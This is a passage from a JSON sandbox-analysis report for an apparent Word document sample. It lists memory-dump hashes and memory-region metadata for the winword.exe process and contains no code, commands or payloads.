"summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "713a772515b7488429a9ca8b9e69a921580f1233", "sha256_hash": "19cbbfb32dab80b6d223f6f4ca34acd6d9aa0c360d857ccbc14b7aa687afe2b1", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001722-addr_0x000007ff00160000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001722-addr_0x000007ff00160000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_317", "md5_hash": "b788b90415c5d1624df169b0d723ecf7", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "7b118a4e2fb9a2b5b28157d07b5b4112b17a87d3", "sha256_hash": 
"cf56e86d9b47679ffff79cbfa8f0c293308513c4ab69dc12380c4dd89dde9c44", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001723-addr_0x000007fffff00000-size_0x0000000000010000-perm_rwx.bin", "filename": "process_00000010-region_00001723-addr_0x000007fffff00000-size_0x0000000000010000-perm_rwx.bin", "id": "proc_dump_318", "md5_hash": "7f3cc7d592a40407d29bff06f64ef86c", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8173983c103d13b3f7027d1e8a3eff28c646a7f6", "sha256_hash": "9f64cfd123fcacd81bafa44740acee3be16a0384d7e9dd62e395ff07d11bafe1", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001724-addr_0x000007fffff10000-size_0x0000000000090000-perm_rwx.bin", "filename": "process_00000010-region_00001724-addr_0x000007fffff10000-size_0x0000000000090000-perm_rwx.bin", "id": "proc_dump_319", "md5_hash": "10ec1779ff66821e48dade7e1c7e78d1", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "23f6dad37dedc17be99ca2683202ef175ebbd293", "sha256_hash": "b7c5667cc3c0d74093fffe3d1eb519f26161e7014155cd7528359cb558ebe592", "size": 589824, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001739-addr_0x0000000001ff0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000010-region_00001739-addr_0x0000000001ff0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_322", "md5_hash": "3c043fa9e476a05d39cd1ee2fad77da5", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a2fe352a26d22809c36bb7eea49494c9efc44503", "sha256_hash": "86a4c42c7f39b8f26b0222e5cf7e7ab4d7bb172607ec359d85c3cef2c75e22a4", "size": 4096, "type": "process_dump", "version": 1 
}, { "archive_path": "process_dumps/process_00000010-region_00001743-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001743-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_324", "md5_hash": "1bfed3c7a77219ee6aada6ae4ab20530", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3ec649d601cb9c69d61b2074ceafbd7aebc989e1", "sha256_hash": "cae5e41050c4800d764fe0962e2e4bf04edd203bae075dca331c123f0a59be94", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001799-addr_0x000000001b800000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000010-region_00001799-addr_0x000000001b800000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_331", "md5_hash": "26ddd04f5a232b810313408af89aa874", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a08392466b76c2d0dcb3d9e839f05aa8499856d3", "sha256_hash": "5d3415b6e66b16a681b63ad30e2401119e27a3825240ec7e232c2243f08899f7", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001855-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001855-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_333", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001856-addr_0x000007ff00190000-size_0x0000000000010000-perm_.bin", 
"filename": "process_00000010-region_00001856-addr_0x000007ff00190000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_334", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001857-addr_0x000007ff001a0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001857-addr_0x000007ff001a0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_335", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001858-addr_0x000007ff001b0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001858-addr_0x000007ff001b0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_336", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001859-addr_0x000007ff001c0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001859-addr_0x000007ff001c0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_337", 
"md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001860-addr_0x000007ff001d0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001860-addr_0x000007ff001d0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_338", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001861-addr_0x000007ff001e0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001861-addr_0x000007ff001e0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_339", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001894-addr_0x000007ff001f0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001894-addr_0x000007ff001f0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_340", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", 
"type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001895-addr_0x000007ff00200000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001895-addr_0x000007ff00200000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_341", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\root\\office16\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_134", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, 
"filename": null, "id": "region_135", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 278527, "entry_point": 0, "filename": null, "id": "region_137", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_138", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 
1380351, "entry_point": 0, "filename": null, "id": "region_139", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_140", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_141", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_142", "name": "pagefile_0x0000000000180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1572864, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, 
"start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_143", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 3108863, "entry_point": 2686976, "filename": "\\Windows\\System32\\locale.nls", "id": "region_144", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2686976, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3174399, "entry_point": 0, "filename": null, "id": "region_145", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3219455, "entry_point": 0, "filename": null, "id": "region_146", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not 
monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3280895, "entry_point": 0, "filename": null, "id": "region_147", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3346431, "entry_point": 0, "filename": null, "id": "region_148", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3416063, "entry_point": 0, "filename": null, "id": "region_149", "name": "pagefile_0x0000000000340000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3407872, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3481599, "entry_point": 0, "filename": null, "id": "region_150", "name": "pagefile_0x0000000000350000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3473408, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump 
was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3551231, "entry_point": 0, "filename": null, "id": "region_151", "name": "pagefile_0x0000000000360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3538944, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_152", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_153", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 4784127, "entry_point": 0, "filename": null, "id": "region_154", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 6389759, "entry_point": 0, "filename": null, "id": "region_155", "name": "pagefile_0x0000000000490000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4784128, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 7999487, "entry_point": 0, "filename": null, "id": "region_156", "name": "pagefile_0x0000000000620000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6422528, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8060928, "type": "region", "version": 1 }, "end_va": 29032447, "entry_point": 0, "filename": null, "id": "region_157", "name": "pagefile_0x00000000007b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8060928, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 29032448, "type": "region", "version": 1 }, "end_va": 31977471, "entry_point": 29032448, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_158", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": 
"memory_mapped_file", "start_va": 29032448, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 31981568, "type": "region", "version": 1 }, "end_va": 36122623, "entry_point": 0, "filename": null, "id": "region_159", "name": "pagefile_0x0000000001e80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31981568, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36175872, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_160", "name": "private_0x0000000002280000", "norm_filename": null, "region_type": "private_memory", "start_va": 36175872, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37224448, "type": "region", "version": 1 }, "end_va": 37236735, "entry_point": 0, "filename": null, "id": "region_161", "name": "pagefile_0x0000000002380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37224448, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37289984, "type": "region", "version": 1 }, "end_va": 37302271, "entry_point": 0, "filename": null, "id": "region_162", "name": 
"pagefile_0x0000000002390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37289984, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37355520, "type": "region", "version": 1 }, "end_va": 37367807, "entry_point": 0, "filename": null, "id": "region_163", "name": "pagefile_0x00000000023a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37355520, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37433343, "entry_point": 0, "filename": null, "id": "region_164", "name": "pagefile_0x00000000023b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37421056, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 37748735, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x00000000023c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37486592, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 37748736, "type": "region", "version": 1 }, "end_va": 37781503, 
"entry_point": 0, "filename": null, "id": "region_166", "name": "private_0x0000000002400000", "norm_filename": null, "region_type": "private_memory", "start_va": 37748736, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 37814272, "type": "region", "version": 1 }, "end_va": 37822463, "entry_point": 0, "filename": null, "id": "region_167", "name": "pagefile_0x0000000002410000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37814272, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 37879808, "type": "region", "version": 1 }, "end_va": 38666239, "entry_point": 37879808, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_168", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 37879808, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38666240, "type": "region", "version": 1 }, "end_va": 38670335, "entry_point": 0, "filename": null, "id": "region_169", "name": "private_0x00000000024e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38666240, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": 
[ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 38731776, "type": "region", "version": 1 }, "end_va": 39256063, "entry_point": 0, "filename": null, "id": "region_170", "name": "private_0x00000000024f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38731776, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39256064, "type": "region", "version": 1 }, "end_va": 39260159, "entry_point": 0, "filename": null, "id": "region_171", "name": "private_0x0000000002570000", "norm_filename": null, "region_type": "private_memory", "start_va": 39256064, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39321600, "type": "region", "version": 1 }, "end_va": 39325695, "entry_point": 0, "filename": null, "id": "region_172", "name": "private_0x0000000002580000", "norm_filename": null, "region_type": "private_memory", "start_va": 39321600, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 39391231, "entry_point": 0, "filename": null, "id": "region_173", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was 
created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39452672, "type": "region", "version": 1 }, "end_va": 39456767, "entry_point": 0, "filename": null, "id": "region_174", "name": "private_0x00000000025a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39452672, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 39518208, "type": "region", "version": 1 }, "end_va": 39583743, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x00000000025b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39518208, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 39583744, "type": "region", "version": 1 }, "end_va": 40497151, "entry_point": 0, "filename": null, "id": "region_176", "name": "pagefile_0x00000000025c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 39583744, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 163840, "start_va": 40501248, "type": "region", "version": 1 }, "end_va": 40665087, "entry_point": 0, "filename": null, "id": "region_177", "name": "private_0x00000000026a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40501248, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 438272, "start_va": 40697856, "type": "region", "version": 1 }, "end_va": 41136127, "entry_point": 0, "filename": null, "id": "region_178", "name": "private_0x00000000026d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40697856, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 20480, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41177087, "entry_point": 0, "filename": null, "id": "region_179", "name": "pagefile_0x0000000002740000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41156608, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", 